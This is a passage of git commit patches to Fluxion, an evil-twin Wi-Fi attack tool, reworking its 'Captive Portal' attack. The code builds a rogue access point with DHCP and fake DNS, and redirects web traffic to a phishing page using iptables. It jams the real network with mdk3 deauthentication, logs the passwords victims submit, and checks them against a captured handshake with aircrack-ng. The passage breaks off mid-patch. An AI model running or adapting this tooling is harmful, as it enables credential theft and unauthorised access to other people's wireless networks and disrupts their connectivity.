"$FLUXIONWorkspacePath/captive_portal/" -type f -exec sed -i -e 's/$APTargetSSID/'"${APTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${APTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${APTargetChannel//\//\\\/}"'/g' {} \; - ;; + "$CaptivePortalGenericInterfaceOption") + source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" + captive_portal_generic + ;; + "$FLUXIONGeneralBackOption") + captive_portal_unset_portal + return 1 + ;; + *) + CaptivePortalUserInterface=$sitePath + ;; esac } -function captive_portal_unset_attack() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - sandbox_remove_workfile "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" - sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" - sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" - # Only reset the AP if one has been defined. - if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then ap_reset - fi -} - -function captive_portal_get_client_IP() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ]; then - MatchedClientIP=$(cat "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" | sed '/^\s*$/d' | tail -n 1 | head -n 1) +captive_portal_get_client_IP() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ]; then + MatchedClientIP=$( + cat "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" | \ + sed '/^\s*$/d' | tail -n 1 | head -n 1 + ) else MatchedClientIP="unknown" fi @@ -386,38 +374,66 @@ function captive_portal_get_client_IP() { echo $MatchedClientIP } -function captive_portal_get_IP_MAC() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ] && [ "$(captive_portal_get_client_IP)" != "" ] && [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then - IP=$(captive_portal_get_client_IP) - MatchedClientMAC=$(cat $FLUXIONWorkspacePath/clients.txt | grep $IP | awk '{print $5}' | grep : | head -n 1 | tr [:upper:] [:lower:]) +captive_portal_get_IP_MAC() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ] && \ + [ "$(captive_portal_get_client_IP)" != "" ] && \ + [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then + local IP=$(captive_portal_get_client_IP) + local MatchedClientMAC=$( + cat $FLUXIONWorkspacePath/clients.txt | \ + grep $IP | awk '{print $5}' | grep : | head -n 1 | \ + tr [:upper:] [:lower:] + ) if [ "$(echo $MatchedClientMAC | wc -m)" != "18" ]; then - MatchedClientMAC="xx:xx:xx:xx:xx:xx" + local MatchedClientMAC="xx:xx:xx:xx:xx:xx" fi else - MatchedClientMAC="unknown" + local MatchedClientMAC="unknown" fi echo $MatchedClientMAC } -function captive_portal_get_MAC_brand() { - local MACManufacturer="" +captive_portal_get_MAC_brand() { if [ $(captive_portal_get_IP_MAC) != "" ]; then - MACManufacturer=$(macchanger -l | grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | cut -d " " -f 5-) + local MACManufacturer=$( macchanger -l | \ + grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | \ + cut -d " " -f 5-) if echo "$MACManufacturer" | grep -q x; then - MACManufacturer="unknown" + local MACManufacturer="unknown" fi else - MACManufacturer="unknown" + local MACManufacturer="unknown" fi echo $MACManufacturer } -# Create different settings required for the script -function captive_portal_set_attack() { - # AP Service: Prepare service for an attack. - if [ "$APRogueService" ]; then ap_prep + +captive_portal_unset_attack() { + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" + sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" + + # Only reset the AP if one has been defined. + if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then + ap_reset fi +} + +# Create different settings required for the script +captive_portal_set_attack() { + # Load and set the captive portal user interface. + cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" \ + "$FLUXIONWorkspacePath/captive_portal" + + find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec \ + sed -i -e 's/$APTargetSSID/'"${FluxionTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${FluxionTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${FluxionTargetChannel//\//\\\/}"'/g' {} \; + # Add the PHP authenticator scripts, used to verify # password attempts from users using the web interface. @@ -435,6 +451,13 @@ function captive_portal_set_attack() { cp -r "$FLUXIONPath/attacks/Captive Portal/lib/connectivity responses/" \ "$FLUXIONWorkspacePath/captive_portal/connectivity_responses" + + # AP Service: Prepare service for an attack. + if [ "$APRogueService" ]; then + ap_prep + fi + + # Generate the dhcpd configuration file, which is # used to provide DHCP service to APRogue clients. echo "\ @@ -443,13 +466,13 @@ authoritative; default-lease-time 600; max-lease-time 7200; -subnet $VIGWNetwork.0 netmask 255.255.255.0 { - option broadcast-address $VIGWNetwork.255; - option routers $VIGWAddress; +subnet $CaptivePortalVIGWNetwork.0 netmask 255.255.255.0 { + option broadcast-address $CaptivePortalVIGWNetwork.255; + option routers $CaptivePortalVIGWAddress; option subnet-mask 255.255.255.0; - option domain-name-servers $VIGWAddress; + option domain-name-servers $CaptivePortalVIGWAddress; - range $VIGWNetwork.100 $VIGWNetwork.254; + range $CaptivePortalVIGWNetwork.100 $CaptivePortalVIGWNetwork.254; }\ " >"$FLUXIONWorkspacePath/dhcpd.conf" @@ -579,7 +602,7 @@ class DNSQuery: return packet if __name__ == '__main__': - ip='$VIGWAddress' + ip='$CaptivePortalVIGWAddress' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -598,16 +621,17 @@ if __name__ == '__main__': chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"} # Attack arbiter script echo "\ #!/bin/bash -function signal_stop_attack() { +signal_stop_attack() { kill -s SIGABRT $$ # Signal STOP ATTACK handle_abort_authenticator } -function handle_abort_authenticator() { +handle_abort_authenticator() { AuthenticatorState=\"aborted\" } @@ -670,25 +694,25 @@ while [ \$AuthenticatorState = \"running\" ]; do if [ -f \"$FLUXIONWorkspacePath/pwdattempt.txt\" -a -s \"$FLUXIONWorkspacePath/pwdattempt.txt\" ]; then # Save any new password attempt. - cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\" + cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\" # Clear logged password attempt. echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\" fi if [ -f \"$FLUXIONWorkspacePath/ip_hits\" -a -s \"$FLUXIONWorkspacePath/ip_hits.txt\" ]; then - cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" - echo \" \" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" + cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" + echo \" \" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" echo -n > \"$FLUXIONWorkspacePath/ip_hits\" fi " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". - if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then + if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | grep -qi \"Passphrase not in\"; then echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" sleep 1 @@ -701,16 +725,16 @@ while [ \$AuthenticatorState = \"running\" ]; do fi" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi - local staticSSID=$(printf "%q" "$APTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") + local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " - DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host)) + DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalVIGWNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" printf \" SSID ...........: $CWht%s$CClr\\n\" \"$staticSSID\" - echo -e \" MAC ............: $CYel$APTargetMAC$CClr\" - echo -e \" Channel ........: $CWht$APTargetChannel$CClr\" - echo -e \" Vendor .........: $CGrn${APTargetMaker:-UNKNOWN}$CClr\" + echo -e \" MAC ............: $CYel$FluxionTargetMAC$CClr\" + echo -e \" Channel ........: $CWht$FluxionTargetChannel$CClr\" + echo -e \" Vendor .........: $CGrn${FluxionTargetMaker:-UNKNOWN}$CClr\" echo -e \" Runtime ........: $CBlu\$ih\$h:\$im\$m:\$is\$s$CClr\" echo -e \" Attempts .......: $CRed\$(cat $FLUXIONWorkspacePath/hit.txt)$CClr\" echo -e \" Clients ........: $CBlu\$(cat $FLUXIONWorkspacePath/clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)$CClr\" @@ -741,7 +765,7 @@ while [ \$AuthenticatorState = \"running\" ]; do echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -763,18 +787,18 @@ echo \" FLUXION $FLUXIONVersion.$FLUXIONRevision SSID: \\\"$staticSSID\\\" -BSSID: $APTargetMAC ($APTargetMaker) -Channel: $APTargetChannel -Security: $APTargetEncryption +BSSID: $FluxionTargetMAC ($FluxionTargetMaker) +Channel: $FluxionTargetChannel +Security: $FluxionTargetEncryption Time: \$ih\$h:\$im\$m:\$is\$s Password: \$(cat $FLUXIONWorkspacePath/candidate.txt) Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand)) IP: $(captive_portal_get_client_IP) -\" >\"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" +\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " -aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log"$CClr"\"\ +aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -782,7 +806,7 @@ aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDCle } # Generate the contents for a generic web interface -function captive_portal_generic() { +captive_portal_generic() { if [ ! -d "$FLUXIONWorkspacePath/captive_portal" ]; then mkdir "$FLUXIONWorkspacePath/captive_portal" fi @@ -876,8 +900,8 @@ function captive_portal_generic() {

-
$APTargetSSID ($APTargetMAC)
- +
$FluxionTargetSSID ($FluxionTargetMAC)
+

@@ -907,9 +931,10 @@ function captive_portal_generic() { " >"$FLUXIONWorkspacePath/captive_portal/index.html" } -function captive_portal_unset_routes() { +captive_portal_unset_routes() { if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then - iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" &>$FLUXIONOutputDevice + iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" \ + &> $FLUXIONOutputDevice sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules" else iptables --flush @@ -920,19 +945,21 @@ function captive_portal_unset_routes() { # Restore system's original forwarding state if [ -f "$FLUXIONWorkspacePath/ip_forward" ]; then - sysctl -w net.ipv4.ip_forward=$(cat "$FLUXIONWorkspacePath/ip_forward") &>$FLUXIONOutputDevice + sysctl -w net.ipv4.ip_forward=$( + cat "$FLUXIONWorkspacePath/ip_forward" + ) &> $FLUXIONOutputDevice sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward" fi - ip addr del $VIGWAddress/24 dev $VIGW 2>/dev/null + ip addr del $CaptivePortalVIGWAddress/24 dev $VIGW 2>/dev/null } # Set up DHCP / WEB server # Set up DHCP / WEB server -function captive_portal_set_routes() { +captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. - ip addr add $VIGWAddress/24 dev $VIGW + ip addr add $CaptivePortalVIGWAddress/24 dev $VIGW # Save the system's routing state to restore later. cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward" @@ -948,21 +975,24 @@ function captive_portal_set_routes() { iptables --table nat --delete-chain iptables -P FORWARD ACCEPT - iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress:80 - iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress:443 + iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ + --to-destination $CaptivePortalVIGWAddress:80 + iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ + --to-destination $CaptivePortalVIGWAddress:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE } -function captive_portal_stop_interface() { +captive_portal_stop_interface() { captive_portal_unset_routes - if [ "$APRogueService" ]; then ap_stop + if [ "$APRogueService" ]; then + ap_stop fi } -function captive_portal_start_interface() { +captive_portal_start_interface() { if [ "$APRogueService" ]; then echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice" ap_start @@ -972,12 +1002,12 @@ function captive_portal_start_interface() { echo -e "$FLUXIONVLine Configuration for external access point device:" echo - fluxion_show_ap_info "$APRogueSSID" "OPEN" "$APTargetChannel" "$APRogueMAC" "$APTargetMaker" + fluxion_target_show "$APRogueSSID" "OPEN" "$FluxionTargetChannel" "$APRogueMAC" "$FluxionTargetMaker" - echo -e "$FLUXIONVLine IPv4 Address: ${VIGWAddress%.*}.2/24" + echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalVIGWAddress%.*}.2/24" echo -e "$FLUXIONVLine IPv6 Address: Disabled" - echo -e "$FLUXIONVLine DHCP Server: $VIGWAddress" - echo -e "$FLUXIONVLine DNS Server: $VIGWAddress" + echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalVIGWAddress" + echo -e "$FLUXIONVLine DNS Server: $CaptivePortalVIGWAddress" echo echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}" @@ -988,61 +1018,97 @@ function captive_portal_start_interface() { captive_portal_set_routes & sleep 3 - fuser -n tcp -k 53 67 80 443 &>$FLUXIONOutputDevice - fuser -n udp -k 53 67 80 443 &>$FLUXIONOutputDevice + fuser -n tcp -k 53 67 80 443 &> $FLUXIONOutputDevice + fuser -n udp -k 53 67 80 443 &> $FLUXIONOutputDevice } -function unprep_attack() { - CaptivePortalState="Not Ready" - captive_portal_unset_attack - captive_portal_unset_site - captive_portal_unset_conn - captive_portal_unset_cert - captive_portal_unset_auth - captive_portal_unset_interface -} -function prep_attack() { - while true; do - captive_portal_set_interface - if [ $? -ne 0 ]; then break; fi - captive_portal_set_auth - if [ $? -ne 0 ]; then - captive_portal_unset_interface - continue - fi - captive_portal_set_cert - if [ $? -ne 0 ]; then - captive_portal_unset_auth - continue - fi - captive_portal_set_conn - if [ $? -ne 0 ]; then - captive_portal_unset_cert - continue - fi - captive_portal_set_site - if [ $? -ne 0 ]; then - captive_portal_unset_conn - continue - fi - captive_portal_set_attack - if [ $? -ne 0 ]; then - captive_portal_unset_site - continue - fi - CaptivePortalState="Ready" - break +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$CaptivePortalCLIArguments" ]; then + if ! CaptivePortalCLIArguments=$( + getopt --options="a:j:s:c:u:h:" \ + --longoptions="ap:,jammer:,ssl:,connectivity:,ui:,hash:" \ + --name="Captive Portal V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit + fi + + declare -r CaptivePortalCLIArguments=$CaptivePortalCLIArguments + + eval set -- "$CaptivePortalCLIArguments" # Set environment parameters. +fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -a|--ap) + CaptivePortalAccessPointInterface=$2; shift;; + -j|--jammer) + CaptivePortalJammerInterface=$2; shift;; + -s|--ssl) + CaptivePortalSSLCertificatePath=$2; shift;; + -c|--connectivity) + CaptivePortalConnectivity=$2; shift;; + -u|--ui) + CaptivePortalUserInterface=$2; shift;; + -h|--hash) + # Assuming hash auth-mode here (the only one available as of now). + # WARNING: If more auth-modes are added, assume hash auth-mode here! + CaptivePortalHashPath=$2; shift;; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" done +} - # Check for prep abortion. - if [ "$CaptivePortalState" != "Ready" ]; then - unprep_attack +unprep_attack() { + CaptivePortalState="Not Ready" + + captive_portal_unset_attack + captive_portal_unset_user_interface + captive_portal_unset_connectivity + captive_portal_unset_certificate + captive_portal_unset_authenticator + captive_portal_unset_ap_interface + captive_portal_unset_jammer_interface +} + +prep_attack() { + local sequence=( + "set_jammer_interface" + "set_ap_interface" + "set_authenticator" + "set_certificate" + "set_connectivity" + "set_user_interface" + "set_attack" + ) + + if ! fluxion_do_sequence captive_portal sequence[@]; then return 1 fi + + CaptivePortalState="Ready" } -function stop_attack() { +stop_attack() { # Attempt to find PIDs of any running authenticators. local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}') @@ -1050,32 +1116,35 @@ function stop_attack() { if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi if [ "$CaptivePortalJammerServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalJammerServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalJammerServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk3_blacklist.lst" # Kill captive portal web server log viewer. if [ "$CaptivePortalWebServiceXtermPID" ]; then - kill $CaptivePortalWebServiceXtermPID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice CaptivePortalWebServiceXtermPID="" # Clear service PID fi # Kill captive portal web server. if [ "$CaptivePortalWebServicePID" ]; then - kill $CaptivePortalWebServicePID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice CaptivePortalWebServicePID="" # Clear service PID fi # Kill python DNS service if one is found. if [ "$CaptivePortalDNSServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDNSServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDNSServiceXtermPID="" # Clear parent PID fi # Kill DHCP service. if [ "$CaptivePortalDHCPServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDHCPServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt" @@ -1085,7 +1154,7 @@ function stop_attack() { CaptivePortalState="Stopped" } -function start_attack() { +start_attack() { if [ "$CaptivePortalState" = "Running" ]; then return 0; fi if [ "$CaptivePortalState" != "Ready" ]; then return 1; fi CaptivePortalState="Running" @@ -1095,27 +1164,41 @@ function start_attack() { captive_portal_start_interface echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice" - xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" -title "FLUXION AP DHCP Service" -e "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & - CaptivePortalDHCPServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \ + -title "FLUXION AP DHCP Service" -e \ + "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & + # Save parent's pid, to get to child later. + CaptivePortalDHCPServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" -title "FLUXION AP DNS Service" -e "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & - CaptivePortalDNSServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ + -title "FLUXION AP DNS Service" -e \ + "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & + # Save parent's pid, to get to child later. + CaptivePortalDNSServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice" - lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" &>$FLUXIONOutputDevice + lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \ + &> $FLUXIONOutputDevice CaptivePortalWebServicePID=$! - xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" -title "FLUXION Web Service" -e "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & + xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" \ + -title "FLUXION Web Service" -e \ + "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & CaptivePortalWebServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice" - echo -e "$APTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" -title "FLUXION AP Jammer Service [$APTargetSSID]" -e "mdk3 $WIMonitor d -c $APTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & - CaptivePortalJammerServiceXtermPID=$! # Save parent's pid, to get to child later. + echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "mdk3 $WIMonitor d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" - xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & + xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \ + -title "FLUXION AP Authenticator" \ + -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & } diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index 9f50533..bbf7fb6 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -2,6 +2,8 @@ # identifier: Captive Portal # description: Creates an "evil twin" access point. +CaptivePortalJammerInterfaceQuery="Select an interface for jamming." +CaptivePortalAPInterfaceQuery="Select an interface for the access point." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalInterfaceQuery="Select an interface for the captive portal." CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." diff --git a/language/en.sh b/language/en.sh index eed0268..a540dea 100755 --- a/language/en.sh +++ b/language/en.sh @@ -59,11 +59,11 @@ FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" -FLUXIONHashSourceRescanOption="Handshake directory (rescan)" +FLUXIONHashSourceRescanOption="Rescan handshake directory" FLUXIONFoundHashNotice="A hash for the target AP was found." FLUXIONUseFoundHashQuery="Do you want to use this file?" -FLUXIONUseFoundHashOption="Use hash" -FLUXIONSpecifyHashPathOption="Specify hash path" +FLUXIONUseFoundHashOption="Use hash found" +FLUXIONSpecifyHashPathOption="Specify path to hash" FLUXIONHashVerificationMethodQuery="Select a method of verification for the hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" From b15c6ec55c789cb28b6b6623e88b3a9dda066cfd Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:11:04 -0600 Subject: [PATCH 19/45] Fixed hash non-reset & verification bug. --- fluxion | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/fluxion b/fluxion index af2cea5..eabed45 100755 --- a/fluxion +++ b/fluxion @@ -1308,7 +1308,7 @@ fluxion_hash_set_path() { return ;; "$FLUXIONHashSourceRescanOption") - fluxion_hash_set_path "$hashPath" + fluxion_hash_set_path "$@" return $? ;; "$FLUXIONGeneralBackOption") @@ -1345,9 +1345,10 @@ fluxion_hash_get_path() { if [ ${#@} -lt 2 ]; then return 1; fi while true; do + fluxion_hash_unset_path if ! fluxion_hash_set_path "$@"; then return $?; fi - if fluxion_hash_verify "$FluxionHashPath" "${@:1}"; then + if fluxion_hash_verify "$FluxionHashPath" "$2" "$3"; then break; fi done From f0151e3efcf53f2825d5d52d7268b7e4ae5b7c38 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:18:10 -0600 Subject: [PATCH 20/45] Virtual interface creation & minior bug fixes. The attack will create a virtual interface if using the interface twice. Virtual interface creation & management needs to be moved to main script! Fixed minor bugs caused by outdated sequencing & identifiers. --- attacks/Captive Portal/attack.sh | 36 +++++++++++++++++++++++++++++--- 1 file changed, 33 insertions(+), 3 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index c792ec9..dd109ba 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -60,6 +60,14 @@ captive_portal_ap_interfaces() { captive_portal_unset_ap_interface() { if [ ! "$CaptivePortalAPInterface" ]; then return 1; fi + if [ "$CaptivePortalAPInterface" = \ + "${CaptivePortalJammerInterface}v" ]; then + if ! 